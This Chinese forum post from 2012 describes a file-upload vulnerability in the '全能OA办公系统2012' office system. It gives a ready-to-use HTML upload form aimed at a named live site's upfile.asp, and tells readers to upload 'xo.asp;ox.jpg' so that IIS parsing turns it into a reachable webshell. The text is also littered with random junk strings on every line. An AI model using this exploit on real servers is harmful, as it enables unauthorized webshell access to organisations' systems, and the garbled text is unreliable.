全能OA办公系统 上传漏洞
3 X, y+ [8 L a' W8 ] o
/ e% Y G. n3 n, N7 F* u/ V系统介绍:4 m' z5 I# K0 w2 ], _
' `9 m A) [5 F5 [9 {2 s
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。- L/ z0 P! ]& l- j) S& ]3 M
+ s2 {1 ~: g8 y/ C# z/ j主要功能:
& p) }6 T7 j- s$ A( T: [公司通告
# p2 I# \+ v! h7 s工作计划
2 F" I2 N; }2 ~* n r, F+ x; Z通讯助理 ; x& ~1 ?9 i. T! }' ~" O
客户资源
& ? w" _, B& S- l3 h3 u( i8 ?我的公文
: f0 X7 o( g4 f公文传阅
* Y9 _; }8 s( [. }公共资源
$ ?5 p) y% Z% S) i4 j: p c资源预约
7 a( X3 e& @% s& B8 @# x今日考勤
; Q* _3 w3 M& h$ c7 L个人计划
1 X. b2 a0 y6 ^, B M; ~个人通讯录
. z! b6 L" J% I: b个人基本档案
7 `% i" ^* F# c- z- f c未读邮件
1 O+ h' I \! A1 J& H. ^发邮件 ( x* K8 K9 i |% K
收件夹 , G) v) v8 v) g# _/ h
寄件夹 . O* e2 J9 t- b+ [' e! I* U k
网络硬盘 7 K9 n! l" T5 G+ p3 l1 \* j% B3 {
网络会议
) P' ]: f+ ]: k, ?/ ]网络调查 Z- G- H; Z4 M3 n; M) d. p: I: U
交流论坛
) ], v. u, k# l) y# U* V6 x9 g9 U" N( B
有兴趣测试的朋友可以下源码看看
3 [$ @' s3 d- m) q* G9 o6 ]. g$ A# ]
源码下载:
- C, f8 K( t% c$ ~; w- Y5 u E3 v, b& j% |8 p
http://www.mycodes.net/30/4750.htm
`6 z5 O8 n( }8 P- w8 w0 N5 G, U( j8 [
漏洞介绍: J# m% R o: \$ ~- Y* ~; D; c
, l2 n( u8 s5 o: {7 w8 X由upfile.asp上传文件漏洞引起
7 G& e2 S- B% P( D3 \
2 L0 k4 J9 r3 Q- n& j* r8 Q) ]" E测试方法:
7 E% l, d. ~4 O) _
! S F( z- }' u使用名小子上传http://www.itlynn.com/upfile.asp即可7 P( M; S' a; w5 m$ x0 O3 q* Z5 B
9 a; v5 R6 w! Z: |; p+ n1 O+ B
如果upfile.asp文件被删除不存在。3 ?( n: h+ i3 A3 B
% j6 h( f a& i! I+ R! B
那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。) Q3 F3 a- h9 X& n
. k! N& o6 i0 D7 {/ U5 F如果存在那么将如下代码保存为upfile.html。# G# A# A5 Q6 B. }. q" Y' O
! j/ I8 q M* R7 X' f' i7 M然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。/ U. a: \- K- h2 ^2 X/ F/ A
+ e9 Q% D$ V- T" s
& d% K5 p7 V: v U# z8 A
' `0 Y3 N7 A. g0 T01 <table border='0' align="center" cellpadding="5">
$ Z8 {9 x( M% W! t% j0 J& O4 o1 q4 L/ R8 c+ N$ A$ c& @- O/ F
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
. Y9 K% s T5 e9 U
$ g# Y( x+ g9 q" W6 B8 `% o, X& ~03 <tr> 2 K( a! ]: Q% D( j2 g/ a9 c
5 d& d( h! ^1 Y: m1 G04 <td>报错:</td>
% C) P" N8 G: }5 q& ?1 m; G% F" O/ y, X
9 K2 N6 a. |2 I+ x* L# D7 i$ |! z Y05 <td><input type='radio' name='errnumber' value='0'>
* D4 J" Z* ^3 q0 M7 o# d
+ a( J0 W% \; ~" {06 自动更名
- `; i* v) A4 ?# n# f7 G; w& ?" H r$ B6 i1 K! |8 }2 Q
07 <input type='radio' name='errnumber' value='1' checked> 7 b' D; J! `* g( n% O0 b Y4 A6 D
" J8 U, G+ t( k7 H0 k% k
08 报错方式
! U; f2 {: N$ b3 `/ J/ i# ]2 ^9 N6 Z* \
09 <input type='radio' name='errnumber' value='2'> 9 B3 o0 W- j" p. f* S6 R9 b& n3 q
2 d' W! j/ w& I/ e/ ?2 f$ ~* L: L10 直接覆盖</td>
5 S: s4 T! I( {0 } t
. p* X' }6 S5 N4 O11 </tr> ; H" d% B# J6 c6 U
6 d! \4 B* m9 a7 E
12 <tr> ' Y0 n; w3 @8 Q; n4 L
4 x# l2 F8 F+ O: n. c, P# D13 <td>主题:</td>
" ]+ [: P' A) ]* u& Z2 N% a, B
: J z) v, s) T14 <td><input type='text' name='filename' size='30'></td>
7 h4 Q" e$ c5 C$ {3 W# ~6 [" `2 t
' ?: L9 v6 r# M1 _8 `$ | n15 </tr> + J5 u2 o& e9 Q* ]5 p8 \
+ D% w1 E# L. V! D- q16 <tr> " q* A6 C7 i9 C" w
- w! `/ V' ?/ u' r
17 <td>文件:</td> 4 q9 Y0 H1 B$ m- S) ?# C
3 q* ?$ A* u& M a6 s18 <td><input type="file"name="fruit"size="30"></td> 5 ~* K1 f4 R4 @3 Y" m* K
A; f/ d7 a/ C9 D; @0 K; k k19 </tr>
9 V8 U. g" g4 W. {$ Z) r
1 }2 Z; N/ j4 Z8 l. Y {20 <tr>
( J1 i# e5 V+ s. z9 x
1 G) t8 L, `2 k4 Q7 z5 x$ N21 <td valign='top'>简介:</td>
4 h1 l' S' ^' E" m; L& \; j, r, M8 }, d" }9 F' s; Y) |
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> ; ]2 f1 d) \: h' X6 n1 F
0 p8 V a- O+ ]- p. d* ^4 Z
23 </tr>
! P% }/ v6 P; ~
' C5 H6 h9 b* j4 a24 m( E2 K! A- ?0 _, _
0 i" s0 g" O h- P- [6 t
25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
% ?( _, G( D+ y; b
! n& |! u8 F" J+ X" f4 A) u26 </tr>
4 N' I6 a U) s" |* H/ L0 l1 v
+ d' C' x) b3 p6 P: }; {) G2 K27 </form>
- k0 ]6 E: o h: o- `& z2 @: |" d$ Z) R8 [
然后打开上传一个文件名为xo.asp;ox.jpg的文件。! [# x7 O, d" g% m+ f7 L) d
/ [0 T& n- P6 J- b' u" A 8 D6 `0 T2 [- r' d. z" c# F# I# G
/ {; W; {0 @, L
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg+ f5 V4 ?- D$ P/ m B6 O% ~/ Z
4 X6 {/ a& T% N) b I' ~9 B
此漏洞需要配合解析漏洞利用。) C0 S5 w f3 C
- y, P6 D% k* [! t# M2 @: k |
发表于 2012-11-21 13:45:12
收藏
支持
反对